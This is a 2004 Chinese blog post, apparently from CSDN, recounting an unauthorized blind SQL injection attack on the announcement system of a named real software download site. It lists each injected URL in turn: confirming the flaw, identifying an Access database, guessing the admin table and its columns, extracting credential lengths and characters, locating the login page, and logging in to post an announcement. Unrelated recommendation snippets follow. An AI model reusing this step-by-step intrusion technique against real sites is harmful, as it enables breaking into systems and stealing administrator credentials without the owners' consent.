[原创]成功注入霏凡主站公告系统

原创 2004年10月13日 10:57:00

作为国内破解软件网站的代表,霏凡(http://www.crsky.net)由于安全的问题,论坛已经关闭了一段时间了。今天无意去霏凡主站,哈哈,,公告系统居然又sql注入漏洞,,于是就又了下面一篇文章。。。



开始用


http://www.crsky.net/zhnew/show.asp?id=26 and 1=1 试了一下
发现没报错。哈哈。有希望。。


http://www.crsky.net/zhnew/show.asp?id=26 and 1=2
出错了,看来存在sql注入漏洞。。


首先要判断数据库类型


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(*) from sysobjects)>;0
出错了。。


估计就是 Access了


接下来猜表名。。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(*) from admin)>;=0
哈哈。。返回正常。。。。一下子就拿到了一个表名。。


然后就要猜用户名的字段了。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(user) from admin)>;=0
错了,看来没有user这个字段。


在试 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(username) from admin)>;=0
晕,还是不对。。


。。。。。。。。


终于 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(name) from admin)>;=0
返回正常了。。。我们又得到了一个用户名字段name


在往后就要猜密码的字段了。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(password) from admin)>;=0
错了,,,接着猜。。


。。。。。。。。。。。。。


终于 http://www.crsky.net/zhnew/show.asp?id=26 and (select count(pwd) from admin)>;=0
哈哈, 正常了。。。

我们又得到了一个密码的字段pwd


晕。。真累。。喝口水先。



要猜用户名了。。


先猜用户名的长度。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;2 返回正常
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;4 出错
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(name) from admin)>;3 正常


得出,用户名长度为4。 先不管他密码加密没加密。。拿到用户名再说


猜用户名第一位。。

http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)>;0 出错了
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)<;128 返回正常
http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 asc(mid(name, 1, 1)) from admin)>;1 出错了!!!


看来asc码为负数,是中文。。。
。。。。。。。。。


猜得用户名: 逃学小龙


猜密码。。



先猜密码的长度。


提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;2 返回正常
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;4 出错
提交 http://www.crsky.net/zhnew/show.asp?id=26 and (select top 1 len(pwd) from admin)>;3 正常


密码的长度也为4。哈哈。。。会不会和用户名一样呢。。。


不管,还不知道管理员入口呢。。。


猜猜看。。
http://www.crsky.net/zhnew/index.asp 不对
。。。。。。


http://www.crsky.net/zhnew/login.asp 找到了。。


把用户名和密码都用逃学小龙试试。。。


成功了!!!!!!



发了个公告。提醒站长一下。。见 http://www.crsky.net/zhnew/show.asp?id=31


累了。。睡觉去。。。

                                                                 2004 .8

(CSDN-霏凡) 企业管理软件

 (CSDN-Crsky)AH企业管理软件(ERP)(CSDN-Crsky)AH客户管理软件(CRM)(CSDN-Crsky)AH办公管理软件(OA)(CSDN-Crsky)AH人事管理软件(HR)(...
  • zhwcb
  • zhwcb
  • 2009年04月25日 04:09
  • 82

Keras cnn example(总结自莫凡)

""" To know more or get code samples, please visit my website: https://morvanzhou.github.io/tutorial...
  • taree
  • taree
  • 2017年03月27日 17:24
  • 1350

曹正道 霏凡软件站

Welcome to my blog!曹正道 曹正道:“既然如此,制使且在小人家里住几时,再有商议。”杨志道: “如此,却是深感你的厚意。只恐官司追捕将来,不敢久住。”曹正道:“制 使这般说...
  • wangya4848
  • wangya4848
  • 2007年08月09日 21:45
  • 459

知县道 霏凡软件

Welcome to my blog!知县道 知县道:“我自到任以来,闻知本府济州管下所属水乡梁山泊贼盗,聚 众打劫,拒敌官军。亦恐各乡村盗贼猖狂,小人甚多。今唤你等两个,休辞 辛苦,与我将带...
  • wangya4848
  • wangya4848
  • 2007年08月09日 21:39
  • 138

jquery滚动公告demo

实现公告栏目循环的滚动效果,直接放代码: tianzi code
  • u011263845
  • u011263845
  • 2015年05月20日 21:11
  • 1311

伍雨霏-懂游戏的云服务如何保驾护航

伍雨霏-懂游戏的云服务如何保驾护航 云服务已经了改变现在IT产业的成本结构,提升了企业净利润,让企业变得更加轻。而UCloud让云服务量更加价格透明化,随着时间推进,我们会有价格降价。此外为...
  • chengying332
  • chengying332
  • 2014年11月04日 14:02
  • 216

中彩3d组合王 霏凡软件站

Welcome to my blog!中彩3d组合王 软件大小:3488 KB软件语言:简体中文软件类别:国产软件 / 共享版 / 彩票工具应用平台:Win9x/NT...
  • wangya4848
  • wangya4848
  • 2007年08月09日 21:15
  • 199

只见老婆问道 霏凡软件

Welcome to my blog!只见老婆问道 只见老婆问道:“丈夫,你如何今日这般嘴脸。”拔涛道:“你一知。前 日太守委我一纸批文,为因黄泥冈上一伙贼人打劫了梁中书与丈人蔡太师庆 生辰的...
  • wangya4848
  • wangya4848
  • 2007年08月09日 21:46
  • 85

Web网站通知系统设计

写在前面: 通知系统是网站信息传播机制的重要的一部分,足够写一大章来说明。本文只梳理设计原则,后续相关内容会持续更新。 这里的通知包括但不限于公告、提醒或消息(不同使用场景下的功能定义不同)。 关于各...
  • anihasiyou
  • anihasiyou
  • 2014年07月25日 09:40
  • 1217

盾灵原创文章投稿系统后台绕过漏洞

代码审计之盾灵原创文章投稿系统后台绕过漏洞
  • Luosec
  • Luosec
  • 2017年06月13日 15:04
  • 469
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:[原创]成功注入霏凡主站公告系统
举报原因:
原因补充:

(最多只允许输入30个字)